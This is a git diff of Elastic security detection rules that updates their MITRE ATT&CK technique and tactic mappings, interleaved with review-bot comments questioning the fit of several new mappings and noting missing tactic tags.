"T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + +[rule.threat.tactic] 
+id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml index dbee870beb8..17b33e323b3 100644 --- a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml +++ b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "Device mount events were added as part of the Elastic Defend Device Control feature." min_stack_version = "9.2.0" -updated_date = "2025/11/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
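Review bot: Three tactics new to this rule (Command and Control, Discovery, Execution) are added while the rule's `tags` list is not touched anywhere in this file's diff, so unless `tags` already carries `Tactic: Command and Control`, `Tactic: Discovery` and `Tactic: Execution`, the check that pairs `Tactic:` tags with `[[rule.threat]]` entries will fail for this rule. The same gap applies to every other file in this chunk that gains a tactic it did not previously carry: initial_access_exfiltration_new_usb_device_mounted (Lateral Movement), initial_access_file_upload_followed_by_get_request (Command and Control), persistence_web_server_potential_command_injection (Credential Access, Defense Evasion, Initial Access), privilege_escalation_echo_nopasswd_sudoers, privilege_escalation_setuid_setgid_bit_set_via_chmod and privilege_escalation_sudoers_file_mod (Defense Evasion), privilege_escalation_trap_execution (Persistence), collection_cloudtrail_logging_created (Defense Evasion), credential_access_aws_getpassword_for_ec2_instance (Privilege Escalation), credential_access_iam_compromisedkeyquarantine_policy_attached_to_user (Initial Access), credential_access_iam_user_addition_to_group (Privilege Escalation), credential_access_rapid_secret_retrieval_attempts_from_secretsmanager (Collection), defense_evasion_rds_instance_restored (Collection) and defense_evasion_sqs_purge_queue (Impact). Either add the matching `Tactic: <name>` tags in the same change or confirm they are already present in each `[rule]` section, which lies outside these hunks.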
@@ -81,34 +81,47 @@ host.os.type:(macos or windows) and event.type:device and event.action:mount and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1091" name = "Replication Through Removable Media" reference = "https://attack.mitre.org/techniques/T1091/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" + [[rule.threat.technique.subtechnique]] id = "T1052.001" name = "Exfiltration over USB" reference = "https://attack.mitre.org/techniques/T1052/001/" - - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1091" +name = "Replication Through Removable Media" +reference = "https://attack.mitre.org/techniques/T1091/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["device.serial_number", "host.id"] diff --git a/rules/cross-platform/initial_access_file_upload_followed_by_get_request.toml b/rules/cross-platform/initial_access_file_upload_followed_by_get_request.toml index b2c14258864..9d7045d8171 100644 --- a/rules/cross-platform/initial_access_file_upload_followed_by_get_request.toml +++ b/rules/cross-platform/initial_access_file_upload_followed_by_get_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/27" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/12/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -143,3 +143,16 @@ reference = "https://attack.mitre.org/techniques/T1505/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/initial_access_ollama_api_external_access.toml b/rules/cross-platform/initial_access_ollama_api_external_access.toml index 4a059992f9c..7692634d9c0 100644 --- a/rules/cross-platform/initial_access_ollama_api_external_access.toml +++ b/rules/cross-platform/initial_access_ollama_api_external_access.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,14 +89,18 @@ network where event.action == "connection_accepted" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml index 6772035224b..8227fb80b3e 100644 --- a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml +++ b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml 
@@ -1,7 +1,7 @@ [metadata] creation_date = "2020/09/14" maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,14 +72,18 @@ Zoom meetings without passcodes are vulnerable to unauthorized access, known as [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/cross-platform/persistence_web_server_potential_command_injection.toml b/rules/cross-platform/persistence_web_server_potential_command_injection.toml index e71c50e44c1..0e14d3d4a48 100644 --- a/rules/cross-platform/persistence_web_server_potential_command_injection.toml +++ b/rules/cross-platform/persistence_web_server_potential_command_injection.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -185,6 +185,16 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + [rule.threat.tactic] id = "TA0002" name = "Execution" 
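Review bot: T1133 (External Remote Services) is added to the Zoom no-passcode rule, but that technique describes an adversary authenticating to externally facing enterprise services such as VPN, RDP or Citrix to reach an internal network, which a passcode-less SaaS meeting does not provide; paired with the existing T1190 (Exploit Public-Facing Application) the entry reads as a loose fit for what the rule observes. The identical T1133 addition in the preceding Ollama hunk is more defensible, since an Ollama API reachable from outside is an exposed remote service, so consider keeping it there and either dropping it here or recording the rationale in this rule's `note`. The enclosing `[rule]` section and its `tags` are outside this hunk.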
@@ -198,6 +208,11 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" @@ -225,3 +240,57 @@ reference = "https://attack.mitre.org/techniques/T1595/003/" id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" 
diff --git a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml index 1aa962b8f7f..5fab4d49a8f 100644 --- a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml +++ b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,19 +72,36 @@ The sudoers file is crucial in Unix-like systems, defining user permissions for [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml index 0c3fbef2c2e..24e3f7af143 100644 --- a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml +++ b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,3 +111,21 @@ framework = "MITRE ATT&CK" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/privilege_escalation_sudo_buffer_overflow.toml b/rules/cross-platform/privilege_escalation_sudo_buffer_overflow.toml index 895ef2afa05..204aea801c8 100644 --- a/rules/cross-platform/privilege_escalation_sudo_buffer_overflow.toml +++ b/rules/cross-platform/privilege_escalation_sudo_buffer_overflow.toml @@ -2,7 +2,7 @@ creation_date = "2021/02/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -88,17 +88,26 @@ Sudo is a critical utility in Unix-like systems, allowing users to execute comma [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.threshold] field = ["host.hostname"] value = 100 diff --git a/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml b/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml index 042c1dd3d5c..817a6c34543 100644 --- a/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml +++ b/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/13" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,3 +96,21 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
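Review bot: T1548.003 (Sudo and Sudo Caching) is added next to T1068 in the Privilege Escalation entry, yet that sub-technique covers abuse of sudoers configuration and cached sudo credentials, not memory-corruption exploitation of the sudo binary, which T1068 already captures. Unless the query (outside this hunk) also fires on configuration abuse, the extra mapping would over-state what the rule detects; consider dropping it or documenting the rationale in the rule's `note`. The `[rule.threshold]` block that follows the hunk is untouched.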
diff --git a/rules/cross-platform/privilege_escalation_trap_execution.toml b/rules/cross-platform/privilege_escalation_trap_execution.toml index d94587dd5b0..64bf0260da2 100644 --- a/rules/cross-platform/privilege_escalation_trap_execution.toml +++ b/rules/cross-platform/privilege_escalation_trap_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,3 +84,21 @@ reference = "https://attack.mitre.org/techniques/T1546/005/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.005" +name = "Trap" +reference = "https://attack.mitre.org/techniques/T1546/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/aws/collection_cloudtrail_logging_created.toml b/rules/integrations/aws/collection_cloudtrail_logging_created.toml index 21998af8115..9c0e12dd9e0 100644 --- a/rules/integrations/aws/collection_cloudtrail_logging_created.toml +++ b/rules/integrations/aws/collection_cloudtrail_logging_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -91,17 +91,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml index d649ef077c5..20256d83f57 100644 --- a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml +++ b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
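Review bot: T1562.008 (Disable or Modify Cloud Logs) is added to a rule that fires when a trail is created, but creating a trail neither disables nor modifies existing logging; the sub-technique fits only if the rule's intent is to catch an adversary standing up a trail they control, for example to redirect log delivery, and nothing in the hunk states that. If that is the intent, say so in the rule's `description` or `note`; otherwise the existing Collection/T1530 mapping may be the only accurate one and the new entry should go. The query and `[rule]` metadata are outside this hunk.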
@@ -121,42 +121,52 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1619" name = "Cloud Storage Object Discovery" reference = "https://attack.mitre.org/techniques/T1619/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml index 7bf37ce9e83..eacc8d821e7 100644 --- a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml +++ b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/10" integration = ["aws"] maturity = "production" -updated_date = "2025/06/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -95,22 +95,39 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.005" name = "Cloud Instance Metadata API" reference = "https://attack.mitre.org/techniques/T1552/005/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn"] diff --git a/rules/integrations/aws/credential_access_iam_compromisedkeyquarantine_policy_attached_to_user.toml b/rules/integrations/aws/credential_access_iam_compromisedkeyquarantine_policy_attached_to_user.toml index 39c54e4f149..57b2baeef95 100644 --- a/rules/integrations/aws/credential_access_iam_compromisedkeyquarantine_policy_attached_to_user.toml +++ b/rules/integrations/aws/credential_access_iam_compromisedkeyquarantine_policy_attached_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/20" integration = ["aws"] maturity = "production" -updated_date = "2025/11/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
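Review bot: T1078.004 (Cloud Accounts) is paired with Privilege Escalation for a rule about GetPasswordData, but the credential that API returns is the local Windows administrator password of the EC2 instance rather than a cloud identity, so T1078.003 (Local Accounts) appears to describe the resulting access more precisely, and the existing T1552.005 already covers the retrieval itself. Confirm which account type the mapping is meant to express before this is merged. The `[rule.new_terms]` block after the hunk is unchanged.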
@@ -78,17 +78,34 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml index d134a095da1..41cee1240b0 100644 --- a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml +++ b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -101,19 +101,42 @@ framework = "MITRE ATT&CK" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/credential_access_rapid_secret_retrieval_attempts_from_secretsmanager.toml b/rules/integrations/aws/credential_access_rapid_secret_retrieval_attempts_from_secretsmanager.toml index 660e039719b..20d915624bf 100644 --- a/rules/integrations/aws/credential_access_rapid_secret_retrieval_attempts_from_secretsmanager.toml +++ b/rules/integrations/aws/credential_access_rapid_secret_retrieval_attempts_from_secretsmanager.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/11" integration = ["aws"] maturity = "production" -updated_date = "2025/11/07" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -130,22 +130,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.006" name = "Cloud Secrets Management Stores" reference = "https://attack.mitre.org/techniques/T1555/006/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.006" +name = "Databases" +reference = "https://attack.mitre.org/techniques/T1213/006/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.threshold] field = ["user.id"] value = 1 diff --git a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml index 2fd99ea0bd8..d6fa16acad3 100644 --- a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml +++ b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/21" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
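Review bot: T1213.006 (Databases) under Collection is a loose fit for Secrets Manager: the store being read is a secrets vault rather than a database, and T1555.006 (Cloud Secrets Management Stores) in the existing entry already names it precisely. If the goal is to express that rapid bulk retrieval is collection and not only credential access, the parent T1213 (Data from Information Repositories) without the `.006` sub-technique would avoid the mismatch; either way the choice deserves a line in the rule's `note`. The `[rule.threshold]` block after the hunk is untouched.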
@@ -132,17 +132,21 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = ["cloud.account.id"] value = 10 diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml index f762db3aa20..2dba17cdace 100644 --- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml +++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/26" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,22 +82,26 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml index b81501f12d9..dea0d7a8dbb 100644 
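Review bot: T1562.008 (Disable or Modify Cloud Logs) is added while T1562.001 (Disable or Modify Tools) is kept in the same entry; .001 is the host-side variant aimed at security tooling, so once the cloud-specific sub-technique is present the generic one is redundant for a CloudTrail deletion and slightly misstates what the rule covers. Consider dropping T1562.001 here and in the identical change to defense_evasion_cloudtrail_logging_suspended.toml that follows, or keep both deliberately and document why in the rule's `note`. The hunk also appears to leave no blank line between the new sub-technique's `reference` line and `[rule.threat.tactic]`, unlike the spacing the other hunks in this series introduce, though the collapsed layout makes that hard to confirm.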
--- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml +++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,22 +83,26 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml index 67bc1c4472a..90f097c14e0 100644 --- 